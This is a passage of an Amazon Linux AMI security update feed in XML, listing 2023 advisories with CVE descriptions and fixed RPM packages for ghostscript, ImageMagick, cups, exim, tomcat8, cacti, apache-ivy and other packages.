arch="x86_64"><filename>Packages/poppler-utils-0.26.5-43.27.amzn1.x86_64.rpm</filename></package><package name="poppler-cpp" version="0.26.5" release="43.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-cpp-0.26.5-43.27.amzn1.x86_64.rpm</filename></package><package name="poppler-debuginfo" version="0.26.5" release="43.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-debuginfo-0.26.5-43.27.amzn1.x86_64.rpm</filename></package><package name="poppler" version="0.26.5" release="43.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-0.26.5-43.27.amzn1.x86_64.rpm</filename></package><package name="poppler-glib" version="0.26.5" release="43.27.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-glib-0.26.5-43.27.amzn1.i686.rpm</filename></package><package name="poppler" version="0.26.5" release="43.27.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-0.26.5-43.27.amzn1.i686.rpm</filename></package><package name="poppler-cpp" version="0.26.5" release="43.27.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-cpp-0.26.5-43.27.amzn1.i686.rpm</filename></package><package name="poppler-cpp-devel" version="0.26.5" release="43.27.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-cpp-devel-0.26.5-43.27.amzn1.i686.rpm</filename></package><package name="poppler-debuginfo" version="0.26.5" release="43.27.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-debuginfo-0.26.5-43.27.amzn1.i686.rpm</filename></package><package name="poppler-devel" version="0.26.5" release="43.27.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-devel-0.26.5-43.27.amzn1.i686.rpm</filename></package><package name="poppler-utils" version="0.26.5" release="43.27.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-utils-0.26.5-43.27.amzn1.i686.rpm</filename></package><package name="poppler-glib-devel" version="0.26.5" release="43.27.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-glib-devel-0.26.5-43.27.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1853</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1853: medium priority package update for ghostscript</title><issued date="2023-09-27 22:15:00" /><updated date="2023-10-06 00:51:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-21710:
A divide by zero issue discovered in eps_print_page in gdevepsn.c in Artifex Software GhostScript 9.50 allows remote attackers to cause a denial of service via opening of crafted PDF file.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-21710" title="" id="CVE-2020-21710" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ghostscript-debuginfo" version="8.70" release="24.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-debuginfo-8.70-24.32.amzn1.x86_64.rpm</filename></package><package name="ghostscript-devel" version="8.70" release="24.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-devel-8.70-24.32.amzn1.x86_64.rpm</filename></package><package name="ghostscript-doc" version="8.70" release="24.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-doc-8.70-24.32.amzn1.x86_64.rpm</filename></package><package name="ghostscript" version="8.70" release="24.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-8.70-24.32.amzn1.x86_64.rpm</filename></package><package name="ghostscript-devel" version="8.70" release="24.32.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-devel-8.70-24.32.amzn1.i686.rpm</filename></package><package name="ghostscript-debuginfo" version="8.70" release="24.32.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-debuginfo-8.70-24.32.amzn1.i686.rpm</filename></package><package name="ghostscript" version="8.70" release="24.32.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-8.70-24.32.amzn1.i686.rpm</filename></package><package name="ghostscript-doc" version="8.70" release="24.32.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-doc-8.70-24.32.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1854</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1854: medium priority package update for ghostscript</title><issued date="2023-09-27 22:15:00" /><updated date="2023-10-06 00:51:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-16305:
A buffer overflow vulnerability in pcx_write_rle() in contrib/japanese/gdev10v.c of Artifex Software GhostScript v9.50 allows a remote attacker to cause a denial of service via a crafted PDF file. This is fixed in v9.51.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16305" title="" id="CVE-2020-16305" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ghostscript-doc" version="8.70" release="24.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-doc-8.70-24.31.amzn1.x86_64.rpm</filename></package><package name="ghostscript-debuginfo" version="8.70" release="24.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-debuginfo-8.70-24.31.amzn1.x86_64.rpm</filename></package><package name="ghostscript-devel" version="8.70" release="24.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-devel-8.70-24.31.amzn1.x86_64.rpm</filename></package><package name="ghostscript" version="8.70" release="24.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-8.70-24.31.amzn1.x86_64.rpm</filename></package><package name="ghostscript-devel" version="8.70" release="24.31.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-devel-8.70-24.31.amzn1.i686.rpm</filename></package><package name="ghostscript-debuginfo" version="8.70" release="24.31.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-debuginfo-8.70-24.31.amzn1.i686.rpm</filename></package><package name="ghostscript" version="8.70" release="24.31.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-8.70-24.31.amzn1.i686.rpm</filename></package><package name="ghostscript-doc" version="8.70" release="24.31.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-doc-8.70-24.31.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1855</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1855: medium priority package update for libtiff</title><issued date="2023-09-27 22:15:00" /><updated date="2023-10-06 00:51:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-5321:
The DumpModeDecode function in libtiff 4.0.6 and earlier allows attackers to cause a denial of service (invalid read and crash) via a crafted tiff image.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5321" title="" id="CVE-2016-5321" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libtiff-devel" version="4.0.3" release="35.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-devel-4.0.3-35.48.amzn1.x86_64.rpm</filename></package><package name="libtiff" version="4.0.3" release="35.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-4.0.3-35.48.amzn1.x86_64.rpm</filename></package><package name="libtiff-debuginfo" version="4.0.3" release="35.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-debuginfo-4.0.3-35.48.amzn1.x86_64.rpm</filename></package><package name="libtiff-static" version="4.0.3" release="35.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-static-4.0.3-35.48.amzn1.x86_64.rpm</filename></package><package name="libtiff-debuginfo" version="4.0.3" release="35.48.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-debuginfo-4.0.3-35.48.amzn1.i686.rpm</filename></package><package name="libtiff" version="4.0.3" release="35.48.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-4.0.3-35.48.amzn1.i686.rpm</filename></package><package name="libtiff-devel" version="4.0.3" release="35.48.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-devel-4.0.3-35.48.amzn1.i686.rpm</filename></package><package name="libtiff-static" version="4.0.3" release="35.48.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-static-4.0.3-35.48.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1856</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1856: medium priority package update for ImageMagick</title><issued date="2023-10-12 15:48:00" /><updated date="2023-10-24 21:38:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-5341:
A vulnerability was found in ImageMagick where heap use-after-free was found in coders/bmp.c.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-5341" title="" id="CVE-2023-5341" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ImageMagick-doc" version="6.9.10.97" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-doc-6.9.10.97-1.30.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-c++" version="6.9.10.97" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-c++-6.9.10.97-1.30.amzn1.x86_64.rpm</filename></package><package name="ImageMagick" version="6.9.10.97" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-6.9.10.97-1.30.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-debuginfo" version="6.9.10.97" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-debuginfo-6.9.10.97-1.30.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-c++-devel" version="6.9.10.97" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-c++-devel-6.9.10.97-1.30.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-devel" version="6.9.10.97" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-devel-6.9.10.97-1.30.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-perl" version="6.9.10.97" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-perl-6.9.10.97-1.30.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-c++" version="6.9.10.97" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-c++-6.9.10.97-1.30.amzn1.i686.rpm</filename></package><package name="ImageMagick-doc" version="6.9.10.97" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-doc-6.9.10.97-1.30.amzn1.i686.rpm</filename></package><package name="ImageMagick-perl" version="6.9.10.97" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-perl-6.9.10.97-1.30.amzn1.i686.rpm</filename></package><package name="ImageMagick-debuginfo" version="6.9.10.97" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-debuginfo-6.9.10.97-1.30.amzn1.i686.rpm</filename></package><package name="ImageMagick-devel" version="6.9.10.97" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-devel-6.9.10.97-1.30.amzn1.i686.rpm</filename></package><package name="ImageMagick" version="6.9.10.97" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-6.9.10.97-1.30.amzn1.i686.rpm</filename></package><package name="ImageMagick-c++-devel" version="6.9.10.97" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-c++-devel-6.9.10.97-1.30.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1857</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1857: medium priority package update for cups</title><issued date="2023-10-12 15:48:00" /><updated date="2023-10-24 21:38:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-4504:
A vulnerability was found in OpenPrinting CUPS. The security flaw occurs due to failure in validating the length provided by an attacker-crafted CUPS document, possibly leading to a heap-based buffer overflow and code execution.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4504" title="" id="CVE-2023-4504" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="cups-lpd" version="1.4.2" release="67.25.amzn1" epoch="1" arch="x86_64"><filename>Packages/cups-lpd-1.4.2-67.25.amzn1.x86_64.rpm</filename></package><package name="cups" version="1.4.2" release="67.25.amzn1" epoch="1" arch="x86_64"><filename>Packages/cups-1.4.2-67.25.amzn1.x86_64.rpm</filename></package><package name="cups-libs" version="1.4.2" release="67.25.amzn1" epoch="1" arch="x86_64"><filename>Packages/cups-libs-1.4.2-67.25.amzn1.x86_64.rpm</filename></package><package name="cups-php" version="1.4.2" release="67.25.amzn1" epoch="1" arch="x86_64"><filename>Packages/cups-php-1.4.2-67.25.amzn1.x86_64.rpm</filename></package><package name="cups-debuginfo" version="1.4.2" release="67.25.amzn1" epoch="1" arch="x86_64"><filename>Packages/cups-debuginfo-1.4.2-67.25.amzn1.x86_64.rpm</filename></package><package name="cups-devel" version="1.4.2" release="67.25.amzn1" epoch="1" arch="x86_64"><filename>Packages/cups-devel-1.4.2-67.25.amzn1.x86_64.rpm</filename></package><package name="cups-devel" version="1.4.2" release="67.25.amzn1" epoch="1" arch="i686"><filename>Packages/cups-devel-1.4.2-67.25.amzn1.i686.rpm</filename></package><package name="cups-php" version="1.4.2" release="67.25.amzn1" epoch="1" arch="i686"><filename>Packages/cups-php-1.4.2-67.25.amzn1.i686.rpm</filename></package><package name="cups-lpd" version="1.4.2" release="67.25.amzn1" epoch="1" arch="i686"><filename>Packages/cups-lpd-1.4.2-67.25.amzn1.i686.rpm</filename></package><package name="cups" version="1.4.2" release="67.25.amzn1" epoch="1" arch="i686"><filename>Packages/cups-1.4.2-67.25.amzn1.i686.rpm</filename></package><package name="cups-libs" version="1.4.2" release="67.25.amzn1" epoch="1" arch="i686"><filename>Packages/cups-libs-1.4.2-67.25.amzn1.i686.rpm</filename></package><package name="cups-debuginfo" version="1.4.2" release="67.25.amzn1" epoch="1" arch="i686"><filename>Packages/cups-debuginfo-1.4.2-67.25.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1858</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1858: medium priority package update for nss-softokn</title><issued date="2023-10-12 15:48:00" /><updated date="2023-10-24 21:38:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-4421:
new tlsfuzzer code can still detect timing issues in RSA operations
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4421" title="" id="CVE-2023-4421" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nss-softokn" version="3.53.1" release="6.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-softokn-3.53.1-6.48.amzn1.x86_64.rpm</filename></package><package name="nss-softokn-devel" version="3.53.1" release="6.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-softokn-devel-3.53.1-6.48.amzn1.x86_64.rpm</filename></package><package name="nss-softokn-freebl-devel" version="3.53.1" release="6.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-softokn-freebl-devel-3.53.1-6.48.amzn1.x86_64.rpm</filename></package><package name="nss-softokn-debuginfo" version="3.53.1" release="6.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-softokn-debuginfo-3.53.1-6.48.amzn1.x86_64.rpm</filename></package><package name="nss-softokn-freebl" version="3.53.1" release="6.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-softokn-freebl-3.53.1-6.48.amzn1.x86_64.rpm</filename></package><package name="nss-softokn" version="3.53.1" release="6.48.amzn1" epoch="0" arch="i686"><filename>Packages/nss-softokn-3.53.1-6.48.amzn1.i686.rpm</filename></package><package name="nss-softokn-freebl-devel" version="3.53.1" release="6.48.amzn1" epoch="0" arch="i686"><filename>Packages/nss-softokn-freebl-devel-3.53.1-6.48.amzn1.i686.rpm</filename></package><package name="nss-softokn-debuginfo" version="3.53.1" release="6.48.amzn1" epoch="0" arch="i686"><filename>Packages/nss-softokn-debuginfo-3.53.1-6.48.amzn1.i686.rpm</filename></package><package name="nss-softokn-devel" version="3.53.1" release="6.48.amzn1" epoch="0" arch="i686"><filename>Packages/nss-softokn-devel-3.53.1-6.48.amzn1.i686.rpm</filename></package><package name="nss-softokn-freebl" version="3.53.1" release="6.48.amzn1" epoch="0" arch="i686"><filename>Packages/nss-softokn-freebl-3.53.1-6.48.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1859</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1859: medium priority package update for libX11</title><issued date="2023-10-12 15:48:00" /><updated date="2023-10-24 21:38:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-43787:
libX11: integer overflow in XCreateImage() leading to a heap overflow.
CVE-2023-43785:
libX11: out-of-bounds memory access in _XkbReadKeySyms()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-43785" title="" id="CVE-2023-43785" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-43787" title="" id="CVE-2023-43787" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libX11-debuginfo" version="1.6.0" release="2.2.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/libX11-debuginfo-1.6.0-2.2.16.amzn1.x86_64.rpm</filename></package><package name="libX11-common" version="1.6.0" release="2.2.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/libX11-common-1.6.0-2.2.16.amzn1.x86_64.rpm</filename></package><package name="libX11-devel" version="1.6.0" release="2.2.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/libX11-devel-1.6.0-2.2.16.amzn1.x86_64.rpm</filename></package><package name="libX11" version="1.6.0" release="2.2.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/libX11-1.6.0-2.2.16.amzn1.x86_64.rpm</filename></package><package name="libX11-devel" version="1.6.0" release="2.2.16.amzn1" epoch="0" arch="i686"><filename>Packages/libX11-devel-1.6.0-2.2.16.amzn1.i686.rpm</filename></package><package name="libX11-common" version="1.6.0" release="2.2.16.amzn1" epoch="0" arch="i686"><filename>Packages/libX11-common-1.6.0-2.2.16.amzn1.i686.rpm</filename></package><package name="libX11" version="1.6.0" release="2.2.16.amzn1" epoch="0" arch="i686"><filename>Packages/libX11-1.6.0-2.2.16.amzn1.i686.rpm</filename></package><package name="libX11-debuginfo" version="1.6.0" release="2.2.16.amzn1" epoch="0" arch="i686"><filename>Packages/libX11-debuginfo-1.6.0-2.2.16.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1860</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1860: important priority package update for exim</title><issued date="2023-10-12 15:48:00" /><updated date="2023-10-24 21:38:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-42117:
Exim Improper Neutralization of Special Elements Remote Code Execution Vulnerability
NOTE: https://www.zerodayinitiative.com/advisories/ZDI-23-1471/
CVE-2023-42116:
Exim SMTP Challenge Stack-based Buffer Overflow Remote Code Execution Vulnerability
NOTE: https://www.zerodayinitiative.com/advisories/ZDI-23-1470/
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-42116" title="" id="CVE-2023-42116" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-42117" title="" id="CVE-2023-42117" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="exim" version="4.92" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-4.92-1.39.amzn1.x86_64.rpm</filename></package><package name="exim-mon" version="4.92" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-mon-4.92-1.39.amzn1.x86_64.rpm</filename></package><package name="exim-mysql" version="4.92" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-mysql-4.92-1.39.amzn1.x86_64.rpm</filename></package><package name="exim-pgsql" version="4.92" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-pgsql-4.92-1.39.amzn1.x86_64.rpm</filename></package><package name="exim-debuginfo" version="4.92" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-debuginfo-4.92-1.39.amzn1.x86_64.rpm</filename></package><package name="exim-greylist" version="4.92" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-greylist-4.92-1.39.amzn1.x86_64.rpm</filename></package><package name="exim-pgsql" version="4.92" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/exim-pgsql-4.92-1.39.amzn1.i686.rpm</filename></package><package name="exim-debuginfo" version="4.92" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/exim-debuginfo-4.92-1.39.amzn1.i686.rpm</filename></package><package name="exim-mon" version="4.92" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/exim-mon-4.92-1.39.amzn1.i686.rpm</filename></package><package name="exim-mysql" version="4.92" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/exim-mysql-4.92-1.39.amzn1.i686.rpm</filename></package><package name="exim-greylist" version="4.92" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/exim-greylist-4.92-1.39.amzn1.i686.rpm</filename></package><package name="exim" version="4.92" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/exim-4.92-1.39.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1861</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1861: important priority package update for tomcat8</title><issued date="2023-10-12 15:48:00" /><updated date="2023-10-24 21:37:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-41080:
URL Redirection to Untrusted Site ('Open Redirect') vulnerability in FORM authentication feature Apache Tomcat.This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.0-M10, from 10.1.0-M1 through 10.0.12, from 9.0.0-M1 through 9.0.79 and from 8.5.0 through 8.5.92.
The vulnerability is limited to the ROOT (default) web application.
CVE-2023-24998:
Apache Commons FileUpload before 1.5 does not limit the number of request parts to be processed resulting in the possibility of an attacker triggering a DoS with a malicious upload or series of uploads. Note that, like all of the file upload limits, the new configuration option (FileUploadBase#setFileCountMax) is not enabled by default and must be explicitly configured.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24998" title="" id="CVE-2023-24998" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-41080" title="" id="CVE-2023-41080" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat8-admin-webapps" version="8.5.93" release="1.94.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-admin-webapps-8.5.93-1.94.amzn1.noarch.rpm</filename></package><package name="tomcat8-log4j" version="8.5.93" release="1.94.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-log4j-8.5.93-1.94.amzn1.noarch.rpm</filename></package><package name="tomcat8-lib" version="8.5.93" release="1.94.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-lib-8.5.93-1.94.amzn1.noarch.rpm</filename></package><package name="tomcat8-docs-webapp" version="8.5.93" release="1.94.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-docs-webapp-8.5.93-1.94.amzn1.noarch.rpm</filename></package><package name="tomcat8" version="8.5.93" release="1.94.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-8.5.93-1.94.amzn1.noarch.rpm</filename></package><package name="tomcat8-javadoc" version="8.5.93" release="1.94.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-javadoc-8.5.93-1.94.amzn1.noarch.rpm</filename></package><package name="tomcat8-webapps" version="8.5.93" release="1.94.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-webapps-8.5.93-1.94.amzn1.noarch.rpm</filename></package><package name="tomcat8-jsp-2.3-api" version="8.5.93" release="1.94.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-jsp-2.3-api-8.5.93-1.94.amzn1.noarch.rpm</filename></package><package name="tomcat8-servlet-3.1-api" version="8.5.93" release="1.94.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-servlet-3.1-api-8.5.93-1.94.amzn1.noarch.rpm</filename></package><package name="tomcat8-el-3.0-api" version="8.5.93" release="1.94.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-el-3.0-api-8.5.93-1.94.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1862</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1862: important priority package update for cacti</title><issued date="2023-10-12 15:48:00" /><updated date="2023-10-24 21:37:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-39364:
Cacti is an open source operational monitoring and fault management framework. In Cacti 1.2.24, users with console access can be redirected to an arbitrary website after a change password performed via a specifically crafted URL. The `auth_changepassword.php` file accepts `ref` as a URL parameter and reflects it in the form used to perform the change password. It's value is used to perform a redirect via `header` PHP function. A user can be tricked in performing the change password operation, e.g., via a phishing message, and then interacting with the malicious website where the redirection has been performed, e.g., downloading malwares, providing credentials, etc. This issue has been addressed in version 1.2.25. Users are advised to upgrade. There are no known workarounds for this vulnerability.
CVE-2023-39362:
Cacti is an open source operational monitoring and fault management framework. In Cacti 1.2.24, under certain conditions, an authenticated privileged user, can use a malicious string in the SNMP options of a Device, performing command injection and obtaining remote code execution on the underlying server. The `lib/snmp.php` file has a set of functions, with similar behavior, that accept in input some variables and place them into an `exec` call without a proper escape or validation. This issue has been addressed in version 1.2.25. Users are advised to upgrade. There are no known workarounds for this vulnerability.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39362" title="" id="CVE-2023-39362" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39364" title="" id="CVE-2023-39364" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="cacti" version="1.1.19" release="5.23.amzn1" epoch="0" arch="noarch"><filename>Packages/cacti-1.1.19-5.23.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1863</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1863: important priority package update for apache-ivy</title><issued date="2023-10-12 15:48:00" /><updated date="2023-10-24 21:37:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-46751:
Improper Restriction of XML External Entity Reference, XML Injection (aka Blind XPath Injection) vulnerability in Apache Software Foundation Apache Ivy.This issue affects any version of Apache Ivy prior to 2.5.2.
When Apache Ivy prior to 2.5.2 parses XML files - either its own configuration, Ivy files or Apache Maven POMs - it will allow downloading external document type definitions and expand any entity references contained therein when used.
This can be used to exfiltrate data, access resources only the machine running Ivy has access to or disturb the execution of Ivy in different ways.
Starting with Ivy 2.5.2 DTD processing is disabled by default except when parsing Maven POMs where the default is to allow DTD processing but only to include a DTD snippet shipping with Ivy that is needed to deal with existing Maven POMs that are not valid XML files but are nevertheless accepted by Maven. Access can be be made more lenient via newly introduced system properties where needed.
Users of Ivy prior to version 2.5.2 can use Java system properties to restrict processing of external DTDs, see the section about "JAXP Properties for External Access restrictions" inside Oracle's "Java API for XML Processing (JAXP) Security Guide".
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-46751" title="" id="CVE-2022-46751" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="apache-ivy-javadoc" version="2.2.0" release="5.2.amzn1" epoch="0" arch="noarch"><filename>Packages/apache-ivy-javadoc-2.2.0-5.2.amzn1.noarch.rpm</filename></package><package name="apache-ivy" version="2.2.0" release="5.2.amzn1" epoch="0" arch="noarch"><filename>Packages/apache-ivy-2.2.0-5.2.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1864</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1864: important priority package update for java-1.8.0-openjdk</title><issued date="2023-10-12 15:48:00" /><updated date="2023-10-24 21:37:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-40433:
An issue was discovered in function ciMethodBlocks::make_block_at in Oracle JDK (HotSpot VM) 11, 17 and OpenJDK (HotSpot VM) 8, 11, 17, allows attackers to cause a denial of service.
